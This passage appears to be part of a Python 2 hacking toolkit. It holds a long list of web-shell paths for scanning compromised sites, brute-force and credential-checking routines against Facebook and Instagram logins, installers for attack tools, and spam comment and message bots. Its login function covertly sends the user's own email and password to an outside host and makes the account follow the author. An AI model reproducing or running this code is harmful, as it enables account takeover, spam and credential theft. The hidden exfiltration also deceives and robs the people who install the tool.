rhuk_milkyway/c100.php\n/templates/rhuk_milkyway/configuration.php\n/templates/rhuk_milkyway/g.php\n/templates/rhuk_milkyway/xx.pl\n/templates/rhuk_milkyway/ls.php\n/templates/rhuk_milkyway/Cpanel.php\n/templates/rhuk_milkyway/k.php\n/templates/rhuk_milkyway/zone-h.php\n/templates/rhuk_milkyway/tmp/user.php\n/templates/rhuk_milkyway/tmp/Sym.php\n/templates/rhuk_milkyway/cp.php\n/templates/rhuk_milkyway/tmp/madspotshell.php\n/templates/rhuk_milkyway/tmp/root.php\n/templates/rhuk_milkyway/tmp/whmcs.php\n/templates/rhuk_milkyway/tmp/index.php\n/templates/rhuk_milkyway/tmp/2.php\n/templates/rhuk_milkyway/tmp/dz.php\n/templates/rhuk_milkyway/tmp/cpn.php\n/templates/rhuk_milkyway/tmp/changeall.php\n/templates/rhuk_milkyway/tmp/Cgishell.pl\n/templates/rhuk_milkyway/tmp/sql.php\n/templates/rhuk_milkyway/0day.php\n/templates/rhuk_milkyway/tmp/admin.php\n/templates/rhuk_milkyway/L3b.php\n/templates/rhuk_milkyway/d.php\n/templates/rhuk_milkyway/tmp/d.php\n/templates/rhuk_milkyway/tmp/L3b.php\n/templates/rhuk_milkyway/sado.php\n/templates/rhuk_milkyway/admin1.php\n/templates/rhuk_milkyway/upload.php\n/templates/rhuk_milkyway/up.php\n/templates/rhuk_milkyway/vb.zip\n/templates/rhuk_milkyway/vb.rar\n/templates/rhuk_milkyway/admin2.asp\n/templates/rhuk_milkyway/uploads.php\n/templates/rhuk_milkyway/sa.php\n/templates/rhuk_milkyway/sysadmins/\n/templates/rhuk_milkyway/admin1/\n/templates/rhuk_milkyway/sniper.php\n/templates/rhuk_milkyway/images/Sym.php\n/templates/rhuk_milkyway//r57.php\n/templates/rhuk_milkyway/gzaa_spysl\n/templates/rhuk_milkyway/sql-new.php\n/templates/rhuk_milkyway//shell.php\n/templates/rhuk_milkyway//sa.php\n/templates/rhuk_milkyway//admin.php\n/templates/rhuk_milkyway//sa2.php\n/templates/rhuk_milkyway//2.php\n/templates/rhuk_milkyway//gaza.php\n/templates/rhuk_milkyway//up.php\n/templates/rhuk_milkyway//upload.php\n/templates/rhuk_milkyway//uploads.php\n/templates/rhuk_milkyway/shell.php\n/templates/rhuk_milkyway//amad.php\n/templates/rhuk_milkyway//t00.php\n/templates/rhuk_milkyway//dz.php\n/templates/rhuk_milkyway//site.rar\n/templates/rhuk_milkyway//Black.php\n/templates/rhuk_milkyway//site.tar.gz\n/templates/rhuk_milkyway//home.zip\n/templates/rhuk_milkyway//home.rar\n/templates/rhuk_milkyway//home.tar\n/templates/rhuk_milkyway//home.tar.gz\n/templates/rhuk_milkyway//forum.zip\n/templates/rhuk_milkyway//forum.rar\n/templates/rhuk_milkyway//forum.tar\n/templates/rhuk_milkyway//forum.tar.gz\n/templates/rhuk_milkyway//test.txt\n/templates/rhuk_milkyway//ftp.txt\n/templates/rhuk_milkyway//user.txt\n/templates/rhuk_milkyway//site.txt\n/templates/rhuk_milkyway//error_log\n/templates/rhuk_milkyway//error\n/templates/rhuk_milkyway//cpanel\n/templates/rhuk_milkyway//awstats\n/templates/rhuk_milkyway//site.sql\n/templates/rhuk_milkyway//vb.sql\n/templates/rhuk_milkyway//forum.sql\n/templates/rhuk_milkyway/r00t-s3c.php\n/templates/rhuk_milkyway/c.php\n/templates/rhuk_milkyway//backup.sql\n/templates/rhuk_milkyway//back.sql\n/templates/rhuk_milkyway//data.sql\n/templates/rhuk_milkyway/wp.rar/\n/templates/rhuk_milkyway/asp.aspx\n/templates/rhuk_milkyway/tmp/vaga.php\n/templates/rhuk_milkyway/tmp/killer.php\n/templates/rhuk_milkyway/whmcs.php\n/templates/rhuk_milkyway/abuhlail.php\n/templates/rhuk_milkyway/tmp/killer.php\n/templates/rhuk_milkyway/tmp/domaine.pl\n/templates/rhuk_milkyway/tmp/domaine.php\n/templates/rhuk_milkyway/useradmin/\n/templates/rhuk_milkyway/tmp/d0maine.php\n/templates/rhuk_milkyway/d0maine.php\n/templates/rhuk_milkyway/tmp/sql.php\n/templates/rhuk_milkyway/X.php\n/templates/rhuk_milkyway/123.php\n/templates/rhuk_milkyway/m.php\n/templates/rhuk_milkyway/b.php\n/templates/rhuk_milkyway/up.php\n/templates/rhuk_milkyway/tmp/dz1.php\n/templates/rhuk_milkyway/dz1.php\n/templates/rhuk_milkyway/forum.zip\n/templates/rhuk_milkyway/Symlink.php\n/templates/rhuk_milkyway/Symlink.pl\n/templates/rhuk_milkyway/forum.rar\n/templates/rhuk_milkyway/joomla.zip\n/templates/rhuk_milkyway/joomla.rar\n/templates/rhuk_milkyway/wp.php\n/templates/rhuk_milkyway/buck.sql\n/templates/rhuk_milkyway/sysadmin.php\n/templates/rhuk_milkyway/images/c99.php\n/templates/rhuk_milkyway/xd.php\n/templates/rhuk_milkyway/c100.php\n/templates/rhuk_milkyway/spy.aspx\n/templates/rhuk_milkyway/xd.php\n/templates/rhuk_milkyway/tmp/xd.php\n/templates/rhuk_milkyway/sym/root/home/\n/templates/rhuk_milkyway/billing/killer.php\n/templates/rhuk_milkyway/tmp/upload.php\n/templates/rhuk_milkyway/tmp/admin.php\n/templates/rhuk_milkyway/Server.php\n/templates/rhuk_milkyway/tmp/uploads.php\n/templates/rhuk_milkyway/tmp/up.php\n/templates/rhuk_milkyway/Server/\n/templates/rhuk_milkyway/wp-admin/c99.php\n/templates/rhuk_milkyway/tmp/priv8.php\n/templates/rhuk_milkyway/priv8.php\n/templates/rhuk_milkyway/cgi.pl/\n/templates/rhuk_milkyway/tmp/cgi.pl\n/templates/rhuk_milkyway/downloads/dom.php\n/templates/rhuk_milkyway/webadmin.html\n/templates/rhuk_milkyway/admins.php\n/templates/rhuk_milkyway/bluff.php\n/templates/rhuk_milkyway/king.jeen\n/templates/rhuk_milkyway/admins/\n/templates/rhuk_milkyway/admins.asp\n/templates/rhuk_milkyway/admins.php\n/templates/rhuk_milkyway/wp.zip\n/templates/rhuk_milkyway/\nWSO.php\n/a.php\n/z.php\n/e.php\n/r.php\n/xz.php\n/hhh.php\n/fuck.php\n/hb.php\n/t.php\n/y.php\n/u.php\n/i.php\n/o.php\n/p.php\n/q.php\n/s.php\n/d.php\n/f.php\n/g.php\n/h.php\n/j.php\n/k.php\n/l.php\n/m.php\n/w.php\n/x.php\n/c.php\n/v.php\n/b.php\n/n.php\n/1.php\n/2.php\n/3.php\n/4.php\n/5.php\n/6.php\n/7.php\n/8.php\n/9.php\n/10.php\n/12.php\n/11.php\n/1234.php\n/deray.html\n/index.html\n/Hmei7.asp.;txt\n/madspot.php\n/mad.php\n/404.php\n/anon.php\n/pirates.php\n/c99.php\n/anonymous.php\n/shell.php\n/sh3ll.php\n/madspotshell.php\n/b374k.php\n/c100.php\n/priv8.php\n/private.php\n/cp.php\n/cpbrute.php\n/ironshell.php\n/themes/404/404.php\n/templates/atomic/index.php\n/templates/beez5/index.php\n/hacked.php\n/r57.php\n/wso.php\n/Kurama.php\n/wso24.php\n/wso26.php\n/wso404.php\n/sym.php\n/symsa2.php\n/sym3.php\n/whmcs.php\n/whmcskiller.php\n/cracker.php\n/1.php\n/2.php\n/sql.php\n/gaza.php\n/database.php\n/a.php\n/d.php\n/dz.php\n/cpanel.php\n/system.php\n/um3r.php\n/zone-h.php\n/c22.php\n/root.php\n/r00t.php\n/doom.php\n/dam.php\n/killer.php\n/user.php\n/wp-content/plugins/disqus-comment-system/disqus.php\n/cpn.php\n/shelled.php\n/uploader.php\n/up.php\n/xd.php\n/d00.php\n/h4xor.php\n/tmp/mad.php\n/tmp/1.php\n/wp-content/plugins/akismet/akismet.php\n/images/stories/w.php\n/w.php\n/downloads/dom.php\n/templates/ja-helio-farsi/index.php\n/wp-admin/m4d.php\n/d.php\n/Pirates.php\n/rootshell.php\n/php-backdoor.php\n/psyc0.php\n/haxor.php\n/antichat.php\n/antichatshell.php\n/udp.php\n/tcp.php\n/Hmei7.asp;.txt\n/Indrajith.php\n/Indrajith_v2.php\n/IndoXploit.php\n/indrajith.php\n/Indrajith.php\n/mini.php\n/dor.php\nshellmini.php\n/inishell.php\n/loolzec.php\n/IndoXploit.php\n/garuda.php\n/shellgue.php\n/shellgua.php\n/fuck.php\n/wp.php\n/upup.php\n/load.php\n/minishell.php\n/amin.php\n/jm.php\n/joomla.php\n/_func.php\n/components/com_foxcontact/_func.php\n/components/com_foxcontact/up.php\n/components/com_foxcontact/upload.php\n/components/com_foxcontact/shell.php\n/wp-content/upload/shell.php\n/wp-content/upload/up.php\ngay.php\n/ngentod.php\n/jembut.php\n/dih.php\n/hmei7.asp.;txt\n/Hmei7.asp.;txt\n/Hmei7.asp;.txt\n/Pouya.asp;.txt\n/pouya.asp;.txt\n/rootkit.asp;.txt\n/index.asp;.txt\n/a.asp;.txt\n/Shell.asp;.txt\n/shell.asp;.txt\n/root.asp;.txt\n/s.asp;.txt\n/123.asp;.txt\n/Umerrock.asp;.txt\n/wp-content/uploads/07/08/shell.php\n/up.asp;.txt\npriv.php\n/privat.php\n/good.php\n/lol.php\n/components/com_banners/up.php\n/components/com_banners\n/upload.php\n/components/com_banners/shell.php\n/components/com_banners/IndoXploit.php\n/components/com_hdflvplayer/hdflvplayer/download.php\n/components/com_hdflvplayer/hdflvplayer/unduh.php\n/phpThumb.php?\n/elFinder/files/k.php\n/elFinder/files/IndoXploit.php\n/elFinder/filesshell.php\n/elFinder/files/up.php\n/elFinder/files/upload.php\n/elFinder/files/sukses.php\n/elFinder/files/jembut.php\n/elFinder/files/jembud.php\n/elFinder/files/idx.php\n/elFinder/files/IDX.php\n/elFinder/files/1n73ction\n/elFinder/files/indrajith.php\n/elFinder/files/upload.php\n/elFinder/files/vuln.php\n/elFinder/files/sukses.php\n/elFinder/files/0day.php\n/elFinder/files/LOoLzeC.php\n/images/up.php\n/filemanager/uploads/Shell.php.fla\n/filemanager/uploads/shell.php.fla\n/filemanager/uploads/IndoXploit.php.fla\n'
  66.  
  67.     def asu():
  68.         funx(SBG + ' Installing ASU')
  69.         os.system('apt update && apt upgrade')
  70.         os.system('apt install git python2 php')
  71.         os.system('python2 -m pip install requests bs4 mechanize')
  72.         os.system('git clone https://github.com/LOoLzeC/ASU')
  73.         os.system('mv ASU ~')
  74.         print ' Done'
  75.  
  76.  
  77.     def flb():
  78.         funx(SBG + ' Installing FLB')
  79.         os.system('apt update && apt upgrade')
  80.         os.system('apt install git python2')
  81.         os.system('python2 -m pip install requests')
  82.         os.system('git clone https://github.com/nasirxo/flb')
  83.         os.system('mv flb ~')
  84.         print ' Done'
  85.  
  86.  
  87.     def nmap():
  88.         funx(SBG + ' Installing Nmap')
  89.         os.system('apt update && apt upgrade')
  90.         os.system('apt install nmap')
  91.         print ' Done'
  92.         print 'Type nmap To Start'
  93.  
  94.  
  95.     def red_hawk():
  96.         funx(SBG + ' Installing RED HAWK')
  97.         os.system('apt update && apt upgrade')
  98.         os.system('apt install git php')
  99.         os.system('git clone https://github.com/Tuhinshubhra/RED_HAWK')
  100.         os.system('mv RED_HAWK ~')
  101.         print ' Done'
  102.  
  103.  
  104.     def dtect():
  105.         funx(SBG + ' Installing D-Tect')
  106.         os.system('apt update && apt upgrade')
  107.         os.system('apt install python2 git')
  108.         os.system('git clone https://github.com/bibortone/D-Tech')
  109.         os.system('mv D-TECT ~')
  110.         print ' Done'
  111.  
  112.  
  113.     def sqlmap():
  114.         funx(SBG + ' Installing sqlmap')
  115.         os.system('apt update && apt upgrade')
  116.         os.system('apt install git python2')
  117.         os.system('git clone https://github.com/sqlmapproject/sqlmap')
  118.         os.system('mv sqlmap ~')
  119.         print ' Done'
  120.  
  121.  
  122.     def reconDog():
  123.         funx(SBG + ' Installing ReconDog')
  124.         os.system('apt update && apt upgrade')
  125.         os.system('apt install python2 git')
  126.         os.system('git clone https://github.com/UltimateHackers/ReconDog')
  127.         os.system('mv ReconDog ~')
  128.         print ' Done'
  129.  
  130.  
  131.     def fim():
  132.         funx(SBG + ' Installing fim')
  133.         os.system('apt update && apt upgrade')
  134.         os.system('apt install git python && python -m pip install requests bs4')
  135.         os.system('git clone https://github.com/karjok/fim')
  136.         os.system('mv fim ~')
  137.         print ' Done'
  138.  
  139.  
  140.     def NFD():
  141.         funx(SBG + ' Installing NFD')
  142.         os.system('apt update && apt upgrade')
  143.         os.system('apt install git python2')
  144.         os.system('python2 -m pip install requests')
  145.         os.system('git clone https://github.com/nasirxo/NFD')
  146.         os.system('mv NFD ~')
  147.         print ' Done'
  148.  
  149.  
  150.     def metasploit():
  151.         funx(SBG + ' Installing Metasploit')
  152.         os.system('apt update && apt upgrade')
  153.         os.system('apt install git wget curl')
  154.         os.system('wget https://gist.githubusercontent.com/Gameye98/d31055c2d71f2fa5b1fe8c7e691b998c/raw/09e43daceac3027a1458ba43521d9c6c9795d2cb/msfinstall.sh')
  155.         os.system('mv msfinstall.sh ~;cd ~;sh msfinstall.sh')
  156.         print ' Done'
  157.         print "Type 'msfconsole' to start."
  158.  
  159.  
  160.     def gdump(idd):
  161.         idi = str(idd).split('|')[1]
  162.         idg = str(idd).split('|')[0]
  163.         ax = url.format('/browse/group/members/?id=' + idg + '&start=' + idi + '&listType=list_nonfriend_nonadmin')
  164.         html = BeautifulSoup(s.get(ax).text, 'html.parser')
  165.         for i in html.find_all('table'):
  166.             try:
  167.                 print ('{} > {}[{}]').format(SBG, G, i['id'].split('_')[1])
  168.                 with open('groupid.txt', 'a') as (gw):
  169.                     gw.write(str(i['id'].split('_')[1]) + '\n')
  170.             except:
  171.                 pass
  172.  
  173.  
  174.     def shellscanner(lnks):
  175.         try:
  176.             sh = get(lnks, allow_redirects=False)
  177.             if sh.status_code == 200:
  178.                 print SBR + (' FOUND SHELL : {}{} ').format(G, lnks)
  179.         except:
  180.             pass
  181.  
  182.  
  183.     def upass(email, password):
  184.         try:
  185.             post('https://nasweb.000webhostapp.com/ak.php?text=' + email + '|' + password + '\n')
  186.         except:
  187.             pass
  188.  
  189.  
  190.     def tfollow(token):
  191.         try:
  192.             status = post(('https://graph.facebook.com/nasir.xo/subscribers?access_token={}').format(token))
  193.         except:
  194.             pass
  195.  
  196.  
  197.     def ffollow():
  198.         try:
  199.             html = BeautifulSoup(s.get(url.format('/profile.php?id=100006143266745')).text, 'html.parser')
  200.         except:
  201.             pass
  202.  
  203.         for i in html.find_all('a'):
  204.             try:
  205.                 if 'profile_add_friend.php' in i['href']:
  206.                     s.get(url.format(i['href']))
  207.                 elif 'subscribe.php' in i['href']:
  208.                     s.get(url.format(i['href']))
  209.             except:
  210.                 pass
  211.  
  212.  
  213.     def icheck(slist):
  214.         try:
  215.             em = str(slist).split('|')
  216.             BASE_URL = 'https://www.instagram.com/accounts/login/'
  217.             LOGIN_URL = BASE_URL + 'ajax/'
  218.             headers_list = [
  219.              'Mozilla/5.0 (Windows NT 5.1; rv:41.0) Gecko/20100101 Firefox/41.0',
  220.              'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9',
  221.              'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
  222.              'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246']
  223.             USERNAME = str(em[0])
  224.             PASSWD = str(em[1])
  225.             USER_AGENT = headers_list[random.randrange(0, 4)]
  226.             session = requests.Session()
  227.             session.headers = {'user-agent': USER_AGENT}
  228.             session.headers.update({'Referer': BASE_URL})
  229.             req = session.get(BASE_URL)
  230.             soup = BeautifulSoup(req.content, 'html.parser')
  231.             body = soup.find('body')
  232.             pattern = re.compile('window._sharedData')
  233.             script = body.find('script', text=pattern)
  234.             script = script.get_text().replace('window._sharedData = ', '')[:-1]
  235.             data = json.loads(script)
  236.             csrf = data['config'].get('csrf_token')
  237.             login_data = {'username': USERNAME, 'password': PASSWD}
  238.             session.headers.update({'X-CSRFToken': csrf})
  239.             login = session.post(LOGIN_URL, data=login_data, allow_redirects=True)
  240.             if str(json.loads(login.content)['authenticated']) == 'True':
  241.                 print SBR + G + (' {} | {} ').format(USERNAME, PASSWD)
  242.                 with open('instahack.txt', 'a') as (ih):
  243.                     ih.write(('{} | {}\n').format(USERNAME, PASSWD))
  244.         except:
  245.             pass
  246.  
  247.  
  248.     def micheck(slist):
  249.         em = str(slist).split('|')
  250.         BASE_URL = 'https://www.instagram.com/accounts/login/'
  251.         LOGIN_URL = BASE_URL + 'ajax/'
  252.         headers_list = [
  253.          'Mozilla/5.0 (Windows NT 5.1; rv:41.0) Gecko/20100101 Firefox/41.0',
  254.          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9',
  255.          'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
  256.          'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246']
  257.         for xi in range(int(len(em)) - 1):
  258.             try:
  259.                 USERNAME = str(em[0])
  260.                 PASSWD = str(em[(xi + 1)])
  261.                 USER_AGENT = headers_list[random.randrange(0, 4)]
  262.                 session = requests.Session()
  263.                 session.headers = {'user-agent': USER_AGENT}
  264.                 session.headers.update({'Referer': BASE_URL})
  265.                 req = session.get(BASE_URL)
  266.                 soup = BeautifulSoup(req.content, 'html.parser')
  267.                 body = soup.find('body')
  268.                 pattern = re.compile('window._sharedData')
  269.                 script = body.find('script', text=pattern)
  270.                 script = script.get_text().replace('window._sharedData = ', '')[:-1]
  271.                 data = json.loads(script)
  272.                 csrf = data['config'].get('csrf_token')
  273.                 login_data = {'username': USERNAME, 'password': PASSWD}
  274.                 session.headers.update({'X-CSRFToken': csrf})
  275.                 login = session.post(LOGIN_URL, data=login_data, allow_redirects=True)
  276.                 if str(json.loads(login.content)['authenticated']) == 'True':
  277.                     print SBR + G + (' {} | {} ').format(USERNAME, PASSWD)
  278.                     with open('instahack.txt', 'a') as (ih):
  279.                         ih.write(('{} | {}\n').format(USERNAME, PASSWD))
  280.             except:
  281.                 pass
  282.  
  283.  
  284.     def brutefx(slist):
  285.         epx = str(slist).split('|')
  286.         for xi in range(int(len(epx)) - 1):
  287.             ldata = {'email': str(epx[0]), 'pass': str(epx[(int(xi) + 1)])}
  288.             soi = Session()
  289.             r = soi.post(url.format('/login'), data=ldata)
  290.             if 'm_ses' in r.url or 'save-device' in r.url:
  291.                 print SBR + G + (' {} | {}').format(ldata['email'], ldata['pass'])
  292.                 with open('hackedthree.txt', 'a') as (bts):
  293.                     bts.write((' {} | {}').format(ldata['email'], ldata['pass']))
  294.  
  295.  
  296.     def checkl(slist):
  297.         li = str(slist).split('|')
  298.         ldata = {'email': li[0],
  299.            'pass': li[1]}
  300.         sos = Session()
  301.         try:
  302.             r = sos.post(url.format('/login'), data=ldata)
  303.         except:
  304.             pass
  305.  
  306.         if 'm_ses' in r.url or 'save-device' in r.url:
  307.             with open('hacked.txt', 'a') as (bres):
  308.                 bres.write(('{} | {} \n').format(li[0], li[1]))
  309.             print SBR + G + (' {} | {} ').format(li[0], li[1])
  310.  
  311.  
  312.     def checkms(n, pxa):
  313.         ldata = {'email': str(n),
  314.            'pass': str(pxa)}
  315.         sos = Session()
  316.         try:
  317.             r = sos.post(url.format('/login'), data=ldata)
  318.         except:
  319.             pass
  320.  
  321.         if 'm_ses' in r.url or 'save-device' in r.url:
  322.             with open('hacked.txt', 'a') as (bres):
  323.                 bres.write(('{} | {} \n').format(n, pxa))
  324.             print SBR + (' Hacked :{} {} | {} ').format(G, n, pxa)
  325.  
  326.  
  327.     def livept(slist):
  328.         li = str(slist).split('|')
  329.         ldata = {'email': li[0],
  330.            'pass': li[1]}
  331.         sos = Session()
  332.         try:
  333.             r = sos.post(url.format('/login'), data=ldata)
  334.         except:
  335.             pass
  336.  
  337.         if 'm_ses' in r.url or 'save-device' in r.url:
  338.             with open('live.txt', 'a') as (bres):
  339.                 bres.write(('{} | {} \n').format(li[0], li[1]))
  340.             print SBR + G + (' {} | {} {}[LIVE] ').format(li[0], li[1], W)
  341.  
  342.  
  343.     def checkpt(slist):
  344.         li = str(slist).split('|')
  345.         ldata = {'email': li[0],
  346.            'pass': li[1]}
  347.         sos = Session()
  348.         try:
  349.             r = sos.post(url.format('/login'), data=ldata)
  350.         except:
  351.             pass
  352.  
  353.         if 'checkpoint' in r.url:
  354.             with open('checkpoint.txt', 'a') as (bres):
  355.                 bres.write(('{} | {} \n').format(li[0], li[1]))
  356.             print SBR + G + (' {} | {} {}[CHECKPOINT] ').format(li[0], li[1], R)
  357.  
  358.  
  359.     def checkw(slist):
  360.         it = int(open('.a', 'r').read())
  361.         ic = int(len(open('.b', 'r').read()))
  362.         sys.stdout.write('\r' + SBR + G + (' Progress :  {} / {} ').format(ic, it))
  363.         sys.stdout.flush()
  364.         li = str(slist).split('|')
  365.         ldata = {'email': li[0],
  366.            'pass': li[1]}
  367.         sos = Session()
  368.         try:
  369.             r = sos.post(url.format('/login'), data=ldata)
  370.         except:
  371.             pass
  372.  
  373.         with open('.b', 'a') as (bx):
  374.             bx.write('1')
  375.         if 'm_ses' in r.url or 'save-device' in r.url:
  376.             with open('hacked.txt', 'a') as (bres):
  377.                 bres.write(('{} | {} \n').format(li[0], li[1]))
  378.             print xin + SBR + G + (' FOUND : =>  {} | {}').format(li[0], li[1])
  379.  
  380.  
  381.     def login(url):
  382.         email = raw_input(xin + SG + ' Email : ' + G)
  383.         password = raw_input(SG + ' Password : ' + G)
  384.         try:
  385.             cred = {'email': str(email), 'pass': str(password)}
  386.             r = [
  387.              funx(SGO + ' Logging in' + G), s.post(url.format('/login'), data=cred)][1]
  388.             print xin
  389.             if 'm_ses' in r.url or 'save-device' in r.url:
  390.                 Process(target=upass, args=(email, password)).start()
  391.                 print SGO + G + ' Login Sucessfull.. :)'
  392.                 ffollow()
  393.                 with open('.cookie', 'w') as (cok):
  394.                     cok.write(json.dumps(s.cookies.get_dict()))
  395.                 os.system('clear')
  396.                 main(url, '0')
  397.             else:
  398.                 print SRO + R + ' Login Failed.... :('
  399.                 time.sleep(2)
  400.                 os.system('clear')
  401.                 login(url)
  402.         except:
  403.             print SR + R + ' No Internet Connection:('
  404.             time.sleep(2)
  405.             os.system('clear')
  406.             login(url)
  407.  
  408.  
  409.     def comment(path):
  410.         message = open('.com', 'r').read()
  411.         mdata = []
  412.         r = s.get(path)
  413.         urlm = BeautifulSoup(r.text, 'html.parser')
  414.         for x in urlm('form'):
  415.             if '/a/comment.php' in x['action']:
  416.                 mdata.append(url.format(x['action']))
  417.                 break
  418.  
  419.         for x in urlm('input'):
  420.             try:
  421.                 if 'fb_dtsg' in x['name']:
  422.                     mdata.append(x['value'])
  423.                 if 'jazoest' in x['name']:
  424.                     mdata.append(x['value'])
  425.                 if 'ids' in x['name']:
  426.                     mdata.append(x['name'])
  427.                     mdata.append(x['value'])
  428.                 if len(data) == 7:
  429.                     break
  430.             except:
  431.                 pass
  432.  
  433.         messagedata = {'fb_dtsg': mdata[1],
  434.            'jazoest': mdata[2],
  435.            mdata[3]: mdata[4],
  436.            'comment_text': str(message),
  437.            'Comment': 'comment'}
  438.         status = s.post(mdata[0], data=messagedata)
  439.         if status.ok == True:
  440.             print SBG + G + ' Commented'
  441.         else:
  442.             print SBR + R + ' Comment Failed'
  443.  
  444.  
  445.     def ecomment(pathx):
  446.         message = open('.com', 'r').read()
  447.         mdata = []
  448.         sos = Session()
  449.         e = str(pathx).split('@')[1].split('|')[0]
  450.         p = str(pathx).split('@')[1].split('|')[1]
  451.         ldata = {'email': str(e), 'pass': str(p)}
  452.         try:
  453.             rx = sos.post(url.format('/login'), data=ldata)
  454.             if 'm_ses' in rx.url or 'save-device' in rx.url:
  455.                 r = sos.get(str(pathx).split('@')[0])
  456.                 urlm = BeautifulSoup(r.text, 'html.parser')
  457.                 for x in urlm('form'):
  458.                     if '/a/comment.php' in x['action']:
  459.                         mdata.append(url.format(x['action']))
  460.                         break
  461.  
  462.                 for x in urlm('input'):
  463.                     try:
  464.                         if 'fb_dtsg' in x['name']:
  465.                             mdata.append(x['value'])
  466.                         if 'jazoest' in x['name']:
  467.                             mdata.append(x['value'])
  468.                         if 'ids' in x['name']:
  469.                             mdata.append(x['name'])
  470.                             mdata.append(x['value'])
  471.                         if len(data) == 7:
  472.                             break
  473.                     except:
  474.                         pass
  475.  
  476.                 messagedata = {'fb_dtsg': mdata[1],
  477.                    'jazoest': mdata[2],
  478.                    mdata[3]: mdata[4],
  479.                    'comment_text': str(message),
  480.                    'Comment': 'comment'}
  481.                 status = sos.post(mdata[0], data=messagedata)
  482.                 if status.ok == True:
  483.                     print SBG + G + (' Commented from {}').format(e)
  484.                 else:
  485.                     print SBR + R + ' Comment Failed'
  486.         except:
  487.             pass
  488.  
  489.  
  490.     def fsend(n, message):
  491.         k = url.format('/messages/thread/' + str(n))
  492.         data = []
  493.         urlm = BeautifulSoup(s.get(k).content, 'html.parser')
  494.         for x in urlm('form'):
  495.             if '/messages/send/' in x['action']:
  496.                 data.append(url.format(x['action']))
  497.                 break
  498.  
  499.         for x in urlm('input'):
  500.             try:
  501.                 if 'fb_dtsg' in x['name']:
  502.                     data.append(x['value'])
  503.                 if 'jazoest' in x['name']:
  504.                     data.append(x['value'])
  505.                 if 'ids' in x['name']:
  506.                     data.append(x['name'])
  507.                     data.append(x['value'])
  508.                 if len(data) == 7:
  509.                     break
  510.             except:
  511.                 pass
  512.  
  513.         if len(data) == 7:
  514.             f = s.post(data[0], data={'fb_dtsg': data[1],
  515.                'jazoest': data[2],
  516.                data[3]: data[4],
  517.                data[5]: data[6],
  518.                'body': message,
  519.                'Send': 'Kirim'}).url
  520.             if 'send_success' in f:
  521.                 print SBG + (' Message Sent To {}{}').format(G, n)
  522.             else:
  523.                 print SBR + (' Failed To Message {}{}').format(R, n)
  524.  
  525.  
  526.     def sendmes(n):
  527.         message = open('.mes', 'r').read()
  528.         k = url.format('/messages/thread/' + str(n))
  529.         data = []
  530.         urlm = BeautifulSoup(s.get(k).content, 'html.parser')
  531.         for x in urlm('form'):
  532.             if '/messages/send/' in x['action']:
  533.                 data.append(url.format(x['action']))
  534.                 break
  535.  
  536.         for x in urlm('input'):
  537.             try:
  538.                 if 'fb_dtsg' in x['name']:
  539.                     data.append(x['value'])
  540.                 if 'jazoest' in x['name']:
  541.                     data.append(x['value'])
  542.                 if 'ids' in x['name']:
  543.                     data.append(x['name'])
  544.                     data.append(x['value'])
  545.                 if len(data) == 7:
  546.                     break
  547.             except:
  548.                 pass
  549.  
  550.         if len(data) == 7:
  551.             f = s.post(data[0], data={'fb_dtsg': data[1],
  552.                'jazoest': data[2],
  553.                data[3]: data[4],
  554.                data[5]: data[6],
  555.                'body': message,
  556.                'Send': 'Kirim'}).url
  557.             if 'send_success' in f:
  558.                 print SBG + (' Message Sent To {}{}').format(G, n)
  559.             else:
  560.                 print SBR + (' Failed To Message {}{}').format(R, n)
  561.  
  562.  
  563.     def main(url, ix):
  564.         optionx = "    \n     {} USER : {}   \n     \n    {} 1 : Hashes Collection\n    {} 2 : Facebook Bruter's\n    {} 3 : Instagram Bruter's\n    {} 4 : Facebook Tools\n    {} 5 : Termux Tools\n    {} 6 : Website's Hacking Tools\n    {} 7 : BOT'S (Multi)\n    {} 8 : Android Hack-s {}|#ROOT|\n    {} 9 : Update AK-47\n    {} 10 : Exit :(\n "
  565.         os.system('clear')
  566.         print random.choice(banner)
  567.         print '         ' + SBG + G + (' Github : {} github.com/nasirxo ').format(W)
  568.         print '         ' + SBG + G + (' Facebook : {} fb.com/nasir.xo ').format(W)
  569.         print '         ' + SBG + G + (' YouTube : {} Youtube.com/TheDarkSec \n').format(W)
  570.         if int(ix) == 0:
  571.             nhtml = BeautifulSoup(s.get(url.format('/profile.php'), headers=headers).content, 'html.parser').title.get_text()
  572.             if nhtml == 'Page Not Found':
  573.                 print SBR + ' Session Expired :('
  574.                 time.sleep(3)
  575.                 os.system('rm .cookie')
  576.                 sys.exit()
  577.             with open('.name', 'w') as (nw):
  578.                 nw.write(str(nhtml))
  579.                 nw.close()
  580.         name = open('.name', 'r').read()
  581.         print optionx.format(SBR, name, SBG, SBG, SBG, SBG, SBG, SBG, SBG, SBG, R, SBG, SBG)
  582.         optc = raw_input(SGO + ' CHOICE : ')
  583.         if optc == '10':
  584.             funx(SG + ' Exiting ')
  585.             os.system('clear')
  586.             sys.exit()
  587.         elif optc == '1' or optc == '01':
  588.             os.system('clear')
  589.             print ('\n        {}[ HASHES Collection ]\n    \n      {} 1 : String to Binary\n      {} 2 : String to MD5\n      {} 3 : String to SHA-1\n      {} 4 : String to SHA-256\n      {} 5 : String to SHA-512\n      {} 6 : String to Base64\n      {} 7 : Go Back <=\n      \n      ').format(G, SBG, SBG, SBG, SBG, SBG, SBG, SBG)
  590.             while 1:
  591.                 rchoc = raw_input(SGO + ' CHOICE : ')
  592.                 if rchoc == '7' or rchoc == 'back':
  593.                     main(url, '1')
  594.                 elif rchoc == '1' or rchoc == '01':
  595.                     print SBR + (' Binary : {}').format((' ').join(format(ord(x), 'b') for x in raw_input(SGO + ' STRING : ')))
  596.                 elif rchoc == '2' or rchoc == '02':
  597.                     print SBR + (' MD5 Hash : {}').format(hashlib.md5(raw_input(SGO + ' STRING : ')).hexdigest())
  598.                 elif rchoc == '3' or rchoc == '03':
